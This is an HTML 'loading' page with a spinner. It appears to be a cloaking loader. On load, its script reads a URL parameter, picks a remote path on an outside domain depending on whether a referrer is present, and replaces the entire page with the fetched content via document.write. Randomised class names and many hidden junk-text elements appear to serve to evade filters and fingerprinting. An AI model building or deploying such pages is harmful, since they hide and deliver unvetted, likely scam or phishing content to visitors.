<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .S7eHKqK {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .S7eHKqK .RKl3kV4W {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .S7eHKqK .content {
            line-height: 50px;
            text-align: center
        }

        .S7eHKqK .img {
            width: 100%
        }

        .S7eHKqK .JxvPCYjx {
            text-align: center
        }

        .S7eHKqK .JxvPCYjx span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .S7eHKqK .JxvPCYjx span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .S7eHKqK .JxvPCYjx span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .S7eHKqK .JxvPCYjx span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .S7eHKqK .JxvPCYjx span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .S7eHKqK .JxvPCYjx span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .S7eHKqK .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function IsifqBMNx(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var KF0fK = IsifqBMNx('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ KF0fK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ KF0fK +".html?a=share";
		}
		
        G0GvZgXiW=url+"#"+new Date().getTime();
        G0GvZgXiW && function() {
            $.get(G0GvZgXiW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>t5CtSXygbCZxdny57JlCs0eOzuncEvUbHGxqEB63iN3xZHPVKn53fctkkaT</span>
<span style='display:none'>t5CtSXygbCZxdny57JlCs0eOzuncEvUbHGxqEB63iN3xZHPVKn53fctkkaT</span>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>drSgZ1XaEmEjtARZRycamHbSn1UfEIvo98owpryq</a>
<b style='display:none' >E7MTMtqUw59aV7nDt4Dfk4KnHDzonflIos</b>
<ul style='display:none' >wcJbI3knc4m3xwMMhHLMYtOh</ul>
<p  style='display:none'>N7ivZy4jQ5qjISdf8euVieXIoKaaFFRQeWk7IsKhvoWHSzWBMseQiT3kPBAYYINfMI868V2fkqueqw8EJynB3QV2ijghXnE8</p>
<li style='display:none' >BORbxrHbvRY6ARHX1bqhGAF0MSI3DdtxYzmOcMAsZ</li>
<a  href='#' style='display:none'>drSgZ1XaEmEjtARZRycamHbSn1UfEIvo98owpryq</a>
<span style='display:none'>t5CtSXygbCZxdny57JlCs0eOzuncEvUbHGxqEB63iN3xZHPVKn53fctkkaT</span><div class="S7eHKqK">
    <div class="RKl3kV4W">
        <div class="JxvPCYjx">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >JqQGh93IYYvtgVxJgZYk4HQKweyV27DSgNNP0a7nsc</h1>
<p  style='display:none'>Hm4iYieUzQ6UwdUduRJn9PfZBDY1gCecoYlRKIyQqTpKCnvkAlGmOEYYeeSlWAxKC0n5hq</p>
<span style='display:none'>lJOuF9AUU2LEcnibwa8xmuYZHlpSyZe1wjIWEnGeFQhN8YBGBfjoAneAnVJe7zyQRWVB</span>
<a  href='#' style='display:none'>zNkw2tY1mJxLwsvYJOKurR5NJR78CtukahNs3YNl</a>
<b style='display:none' >Mkk88Kyrro9gKmm1d92HMx76u9tnnwAxCXq4dUfSceg6SwYOR1</b>
<span style='display:none'>lJOuF9AUU2LEcnibwa8xmuYZHlpSyZe1wjIWEnGeFQhN8YBGBfjoAneAnVJe7zyQRWVB</span>
<ul style='display:none' >DQhee1ZbxXk7PXdF9JlazfJXAlofqk4Cklu5LzDjuIDXZ2iaHk0OiKmGS5VxRO</ul></body>
</html>